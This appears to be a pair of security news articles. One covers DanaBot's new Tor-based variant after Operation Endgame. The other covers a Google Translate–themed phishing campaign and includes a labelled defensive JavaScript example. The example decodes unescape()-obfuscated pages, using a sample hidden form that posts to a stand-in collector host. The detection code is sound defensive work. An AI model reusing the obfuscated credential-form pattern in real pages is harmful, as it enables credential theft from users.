
DanaBot Malware Resurfaces With New Variant After Operation Endgame Disruption


Despite a coordinated international takedown earlier this year, the DanaBot malware has returned with a newly upgraded version, signaling yet another resurgence of a threat that has repeatedly evaded permanent shutdown. The fresh discovery comes roughly six months after law enforcement agencies crippled the malware’s network during Operation Endgame, a global effort that announced infrastructure seizures and criminal indictments in May. Researchers at Zscaler ThreatLabz now report that DanaBot is once again circulating in attacks, with a rebuilt architecture designed for persistence and continued financial gain. 

The latest version, identified as DanaBot 669, introduces a command-and-control system based on Tor hidden services and “backconnect” nodes. By routing malicious communication through .onion domains, the operators create a layer of anonymity that makes tracking and disruption significantly more difficult. Zscaler’s analysis also uncovered several active cryptocurrency wallet addresses linked to the campaign, spanning Bitcoin, Ethereum, Litecoin, and TRON, which the attackers are using to collect stolen funds from victims. 

DanaBot first emerged several years ago when researchers at Proofpoint revealed it as a Delphi-written banking trojan delivered largely through phishing emails and malvertising lures. Its creators adopted a malware-as-a-service model, renting out access to cybercriminal groups who used it to harvest credentials from online banking sessions. Over time, the malware evolved into a modular system capable of functioning as both an information stealer and a loader, extracting stored browser data — including crypto wallet details — and enabling follow-on payloads such as ransomware. 

Although Operation Endgame temporarily slowed activity, it did not eliminate the malware’s core operators. Threat actors simply paused long enough to rebuild infrastructure and adapt their tactics. During this downtime, many initial access brokers shifted toward other malware families, but the financial motivation behind DanaBot ensured its eventual revival. Its steady reappearance in campaigns since 2021 has shown that as long as cybercrime remains profitable, disruptions are rarely permanent.

Zscaler warns that current DanaBot campaigns employ familiar distribution methods. Malicious email attachments and links continue to be the main infection route, while SEO poisoning and deceptive online advertisements also lure victims into executing the malware. Some infections have been linked to wider incidents involving ransomware deployments, demonstrating the tool’s ongoing role in larger criminal ecosystems. 

Organizations can reduce exposure by updating security tools and blocking newly published indicators of compromise from Zscaler’s latest intelligence. The return of DanaBot highlights a recurring cybersecurity reality: even major law enforcement actions cannot fully dismantle financially driven malware operations when key actors remain at large.

Hackers Mimic Google Translate to Launch Phishing Attacks


Threat analysts at Avanan, a Check Point Software firm, have unearthed a novel phishing campaign mimicking Google Translate in order to lure users. 

The attackers use obfuscated code to make the phishing sites look authentic to the victim and to slip past security gateways. They also rely on social engineering, telling users they must respond to an email immediately or permanently lose access to unread messages.

The victims are then asked to click a link embedded in the email. The link leads to a credential-stealing page that looks like a genuine Google Translate page; the email address field is already filled in, so the victim only has to enter a password.

According to a blog post published last week, this is a standard modus operandi among phishers: it creates a sense of urgency and pushes victims to act rashly by clicking a malicious link or opening a malicious attachment. Behind the scenes, the attackers also employ a lot of JavaScript, including the unescape function, to hide their true intentions.

unescape is a legacy JavaScript function that takes a single string argument and returns a new string, reversing the encoding applied by the escape function. The hexadecimal escape sequences in the string (%XX and %uXXXX) are replaced by the characters they represent, so the real page content only appears once the code runs.
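An added analysis example (not code from Avanan or from the original post) that shows how a defender can surface what such obfuscation hides: it re-implements the percent-decoding that unescape() performs, pulls every unescape('...') string literal out of a page, and flags decoded markup that posts to a host other than the page's own. The sample HTML, the hostnames and the function names are constructed for this illustration.

```javascript
// Re-implementation of the decoding done by the legacy unescape():
// %XX -> Latin-1 character XX, %uXXXX -> UTF-16 code unit XXXX,
// anything else (including malformed % sequences) is left untouched.
function percentUnescape(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g, (m, u4, h2) =>
    String.fromCharCode(parseInt(u4 !== undefined ? u4 : h2, 16)));
}

// Matches unescape('...') / unescape("...") calls whose argument is a plain string literal.
const UNESCAPE_CALL = /unescape\s*\(\s*(['"])((?:\\.|(?!\1)[^\\])*)\1\s*\)/g;

// Return the decoded content of every unescape() literal found in the page source.
function extractUnescapePayloads(html) {
  return [...html.matchAll(UNESCAPE_CALL)].map((m) => percentUnescape(m[2]));
}

// Pull absolute http(s) URLs out of decoded text (form actions, href/src values, bare links).
function findUrls(text) {
  return [...new Set([...text.matchAll(/https?:\/\/[^\s"'<>]+/g)].map((m) => m[0]))];
}

// Decode all hidden payloads and report URLs pointing away from the host serving the page;
// decoded markup containing a <form> that posts elsewhere is the classic credential-theft pattern.
function analyse(html, pageHost) {
  const decoded = extractUnescapePayloads(html);
  const findings = [];
  for (const payload of decoded) {
    for (const url of findUrls(payload)) {
      let host;
      try { host = new URL(url).hostname; } catch { continue; }
      if (host !== pageHost) findings.push({ url, host, hasForm: /<form\b/i.test(payload) });
    }
  }
  return { payloadCount: decoded.length, decoded, findings };
}

// Constructed sample page: one hidden form posting to an external collector, one harmless string.
const SAMPLE_HTML = `<html><body><div id="app"></div>
<script>document.write(unescape('%3Cform%20method%3D%22post%22%20action%3D%22https%3A%2F%2Fcollector.example.invalid%2Fsubmit%22%3E%3C%2Fform%3E'));
var label = unescape("Sign%20in%u2026");</script></body></html>`;

const report = analyse(SAMPLE_HTML, 'page.example.invalid');
console.log(JSON.stringify(report, null, 2));
```

Run under Node.js; the report lists the decoded form and flags collector.example.invalid as an off-host form target.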

“This attack has a little bit of everything. It has unique social engineering at the front end. It leverages a legitimate site to help get into the inbox. It uses trickery and obfuscation to confuse security services,” stated Jeremy Fuchs, a cybersecurity threat analyst at Avanan.

To guard against these attacks, users need to be extra vigilant. The researchers recommended users scan the URLs found in messages before clicking on them to ensure the destination is legitimate.

Users can also judge the authenticity of an email by paying closer attention to grammar, spelling, and factual inconsistencies in its text. If they are unsure where a message came from or what it is asking for, they should confirm with the purported sender through a separate channel before taking any further action.